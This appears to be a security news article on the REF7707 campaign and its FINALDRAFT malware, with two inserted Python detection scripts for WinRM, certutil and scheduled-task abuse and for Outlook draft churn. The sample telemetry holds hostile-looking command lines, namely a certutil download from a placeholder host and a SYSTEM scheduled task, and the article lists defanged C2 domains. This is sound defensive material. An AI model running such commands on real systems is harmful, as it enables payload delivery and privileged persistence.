
REF7707 Cybercriminals Exploit FINALDRAFT Malware to Attack Windows & Linux Systems


In a recent investigation, Elastic Security Labs uncovered a global cyberespionage campaign attributed to the threat actor group REF7707.

This operation leverages a novel malware family, FINALDRAFT, targeting both Windows and Linux systems.

The campaign has been linked to attacks on a South American foreign ministry and entities in Southeast Asia, showcasing the group’s technical capabilities and operational missteps.

Advanced Malware with Cross-Platform Reach

FINALDRAFT is a highly engineered remote administration tool (RAT) written in C++ and designed for espionage.

It includes advanced features such as process injection, file manipulation, and network proxying.

Its standout capability is leveraging Microsoft’s Graph API for command-and-control (C2) communications via Outlook email drafts.

This method allows the malware to blend malicious activities into legitimate traffic, evading traditional detection mechanisms.

The malware operates alongside loaders like PATHLOADER and GUIDLOADER, which execute encrypted shellcode in memory.

These loaders facilitate the deployment of FINALDRAFT by downloading payloads from attacker-controlled infrastructure.

Notably, FINALDRAFT has variants for both Windows and Linux, with the Linux version supporting multiple C2 protocols, including HTTP/HTTPS and reverse UDP.

Exploitation Techniques

REF7707 employs several sophisticated techniques to evade detection and maintain persistence:

  • Abuse of Legitimate Tools: The attackers utilize Microsoft’s certutil application and Windows Remote Management’s Remote Shell plugin (WinrsHost.exe) to download and execute payloads.
  • Process Injection: FINALDRAFT injects shellcode into legitimate processes like mspaint.exe, ensuring stealthy operation.
  • Persistence Mechanisms: The malware uses Scheduled Tasks in Windows to run malicious binaries at regular intervals with SYSTEM privileges.
  • Obfuscation: String encryption and API hashing are employed to hinder static analysis.
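The four techniques above all leave endpoint telemetry: a certutil download, a child process under WinrsHost.exe, and a scheduled task registered to run as SYSTEM. The following script is an added example, not code from Elastic Security Labs or from the article, showing how a defender can run simple detection rules over process-creation events. The event schema (parent_image, image, command_line, user) and the sample events are constructed for the example; the download URL is a placeholder, not an indicator from the campaign.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record; field names are an assumption for this example."""
    parent_image: str
    image: str
    command_line: str
    user: str


# Constructed sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    # Benign: a user opening Notepad from Explorer.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe", "CORP\\alice"),
    # A shell spawned by the WinRM remote-shell host.
    ProcessEvent(r"C:\Windows\System32\winrshost.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c whoami", "CORP\\svc-admin"),
    # certutil used to fetch a remote file (URL is a placeholder).
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
                 r"certutil -urlcache -split -f http://example.invalid/payload.bin C:\Users\Public\p.bin",
                 "CORP\\svc-admin"),
    # A scheduled task registered to run every 30 minutes as SYSTEM.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
                 r"schtasks /create /tn Updater /tr C:\Users\Public\p.exe /sc minute /mo 30 /ru SYSTEM",
                 "CORP\\svc-admin"),
    # Benign: a task created under a named service account, not SYSTEM.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
                 r"schtasks /create /tn Backup /tr C:\Tools\backup.exe /sc daily /ru CORP\svc-backup /rp *",
                 "CORP\\bob"),
]


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(event: ProcessEvent) -> list[str]:
    """Apply the three rules to one event and return the human-readable findings."""
    findings = []
    img = basename(event.image)
    parent = basename(event.parent_image)
    cl = event.command_line.lower()

    # Rule 1: certutil's URL cache switch combined with an http(s) URL is a download.
    if img == "certutil.exe" and "urlcache" in cl and re.search(r"https?://", cl):
        findings.append("certutil used to download a remote file")

    # Rule 2: WinrsHost.exe is the WinRM remote-shell host; interactive tools under it
    # mean commands are being run remotely through WinRM.
    if parent == "winrshost.exe" and img in {"cmd.exe", "powershell.exe", "certutil.exe"}:
        findings.append("command execution via WinRM remote shell (WinrsHost.exe)")

    # Rule 3: a task created with /ru SYSTEM (or NT AUTHORITY\SYSTEM) gains SYSTEM privileges.
    if img == "schtasks.exe" and "/create" in cl and re.search(r'/ru\s+"?(nt authority\\)?system\b', cl):
        findings.append("scheduled task created to run as SYSTEM")

    return findings


def scan(events: list[ProcessEvent]) -> list[tuple[int, str]]:
    """Run detect() over every event; return (event index, finding) pairs."""
    return [(i, f) for i, e in enumerate(events) for f in detect(e)]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Each rule alone is noisy in an environment where administrators legitimately use certutil, WinRM or SYSTEM tasks; the value is in correlating them on the same host and account within a short window, as the constructed events above would do.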

(Figure: WinrsHost.exe is used to execute commands)

The Linux variant mirrors many of these capabilities, including executing shell commands via popen and a self-deletion mechanism that erases traces after the intrusion.

Despite its sophistication, REF7707’s campaign management exhibited flaws.

Poor operational security exposed pre-production malware samples and additional infrastructure.

For instance, attackers inadvertently revealed domains such as support.vmphere[.]com and update.hobiter[.]com, which were linked to their command-and-control servers.

The discovery of FINALDRAFT highlights the growing trend of cybercriminals exploiting legitimate cloud services like Microsoft Graph API for covert operations.

This technique complicates detection efforts as malicious traffic is indistinguishable from legitimate business activities.

Organizations are urged to adopt robust security measures, including:

  • Monitoring anomalous activity in email drafts and OAuth token usage.
  • Deploying endpoint detection tools capable of identifying process injection.
  • Enforcing strict access controls for cloud services.
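Draft-based C2 has a distinctive shape in mailbox audit data: drafts are created by a non-interactive client, read, and deleted shortly afterwards, and none of them is ever sent. The following script is an added example, not code from the article or from Elastic Security Labs, that scores this create-then-delete churn per mailbox and client application. The record format (ts, op, mailbox, app, item) and the sample records are constructed for the example and do not correspond to a real product's audit schema; the thresholds are assumptions to tune against baseline data.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed mailbox audit records (field names are an assumption for this example).
SAMPLE_RECORDS = [
    # Normal user behaviour: one draft, then the message is sent.
    {"ts": "2025-02-01T08:00:00", "op": "DraftCreated", "mailbox": "alice@corp.example",
     "app": "Outlook desktop", "item": "a1"},
    {"ts": "2025-02-01T08:03:00", "op": "MessageSent", "mailbox": "alice@corp.example",
     "app": "Outlook desktop", "item": "a1"},
]

# Suspicious behaviour: an unattended client (placeholder name) creates and deletes
# a draft every two minutes, and nothing is ever sent.
for i in range(6):
    base = datetime(2025, 2, 1, 9, 0) + timedelta(minutes=2 * i)
    SAMPLE_RECORDS.append({"ts": base.isoformat(), "op": "DraftCreated",
                           "mailbox": "bob@corp.example", "app": "unattended-client-0001",
                           "item": f"b{i}"})
    SAMPLE_RECORDS.append({"ts": (base + timedelta(seconds=40)).isoformat(), "op": "DraftDeleted",
                           "mailbox": "bob@corp.example", "app": "unattended-client-0001",
                           "item": f"b{i}"})


def draft_churn(records, window=timedelta(minutes=10), min_cycles=5):
    """Count drafts that are created and deleted within `window` without being sent.

    Returns {(mailbox, app): cycles} for every pair at or above `min_cycles`.
    """
    created = {}          # item id -> creation time, while the draft still exists
    sent = set()          # item ids that were legitimately sent
    cycles = defaultdict(int)

    for r in sorted(records, key=lambda r: r["ts"]):
        ts = datetime.fromisoformat(r["ts"])
        key = (r["mailbox"], r["app"])
        if r["op"] == "DraftCreated":
            created[r["item"]] = ts
        elif r["op"] == "MessageSent":
            sent.add(r["item"])
        elif r["op"] == "DraftDeleted":
            t0 = created.pop(r["item"], None)
            # Only a short-lived, never-sent draft counts towards the churn score.
            if t0 is not None and r["item"] not in sent and ts - t0 <= window:
                cycles[key] += 1

    return {k: n for k, n in cycles.items() if n >= min_cycles}


if __name__ == "__main__":
    for (mailbox, app), n in draft_churn(SAMPLE_RECORDS).items():
        print(f"{mailbox}: {n} create/delete draft cycles by {app}")
```

In practice the client application field is the strongest signal: a mailbox whose drafts are manipulated by an application the organisation never consented to, or by a token issued outside normal sign-in flows, deserves review even before the churn count crosses the threshold.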

Elastic Security Labs emphasizes that defending against such advanced threats requires a multi-layered approach combining network visibility, endpoint protection, and threat intelligence.
